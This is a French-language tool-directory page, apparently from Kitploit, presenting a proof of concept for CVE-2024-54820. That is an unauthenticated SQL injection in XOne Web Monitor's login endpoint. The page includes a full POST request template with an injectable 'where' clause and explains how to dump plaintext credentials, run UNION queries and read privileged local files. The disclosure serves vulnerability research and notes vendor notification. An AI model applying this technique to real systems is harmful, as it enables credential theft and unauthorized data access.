Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-54820 — Preuve de concept pour une vulnérabilité d'injection SQL non authentifiée dans XOne Web Monitor qui permet l'exfiltration d'identifiants et l'extraction de données via des requêtes POST forgées. | Kitploit
Outils/GitHubGitHub/jcarabantes/cve-2024-54820
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubjcarabantes/cve-2024-54820

CVE-2024-54820

Preuve de concept pour une vulnérabilité d'injection SQL non authentifiée dans XOne Web Monitor qui permet l'exfiltration d'identifiants et l'extraction de données via des requêtes POST forgées.

Voir le dépôt
21il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Vulnérabilité : Injection SQL non authentifiée - Extraction de mots de passe en clair

Auteur : Javier Carabantes

Logiciel concerné : XOne Web Monitor

Logiciel : https://xone.es/

Version concernée : 02.10.2024.530 framework 1.0.4.9

Description

Une vulnérabilité d'injection SQL non authentifiée a été découverte dans la fonctionnalité de connexion de XOne Web Monitor version 02.10.2024.530 framework 1.0.4.9 . Cette faille permet aux attaquants d'exploiter une gestion inappropriée des entrées utilisateur lors du processus d'authentification pour extraire tous les noms d'utilisateur et mots de passe stockés. Plus précisément, la conception du point de terminaison de connexion permet aux attaquants de manipuler une clause WHERE via un paramètre d'entrée vulnérable.

Point de terminaison concerné

/webcore/api/itf/DoAction

Preuve de concept

Ce qui suit montre comment la vulnérabilité peut être exploitée à l'aide d'une requête POST conçue pour la version vulnérable : Login

Lorsqu'une connexion invalide est fournie, comme "test:test", la requête suivante est envoyée

Request

root@kitploit:~
POST /webcore/api/itf/DoAction HTTP/1.1
Host: redacted:44330
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://redacted:44330/
Content-Type: application/json
Authorization: Bearer redacted
Content-Length: 124
Origin: http://redacted:44330
Connection: keep-alive

{"action":"select","count":false,"page":{},"coll":"Usuarios","macros":{},"where":"(LOGIN='test')","sort":"","loadall":false}

Notez que le mot de passe n'est pas envoyé et que le nom d'utilisateur est encapsulé dans une propriété where. Modifier l'opérateur du champ LOGIN donnera la liste complète des utilisateurs et des mots de passe en texte clair :

Burp Suite Example

Cred dump

La réponse révèle la liste de tous les noms d'utilisateur et de leurs mots de passe correspondants stockés dans la base de données. Tout utilisateur a la capacité d'accéder et d'obtenir des données sensibles (clients, postes d'employés, etc.).

Sensitive data

Remarques supplémentaires

Cette vulnérabilité d'injection SQL prend également en charge l'utilisation de requêtes UNION dans MSSQL, permettant aux attaquants d'énumérer et de récupérer des données d'autres tables de la base de données.

union select

La même injection permet une LFD si l'attaquant connaît le chemin absolu, exemple de lecture de C:/windows/system32/grouppolicy/machine/registry.pol, un fichier privilégié :

LFD

Avertissement

Le fournisseur a été informé de cette vulnérabilité au cours de la semaine du 11/11/2024.

La page Web montrée dans la PoC a été dépubliée.

Télécharger l’outil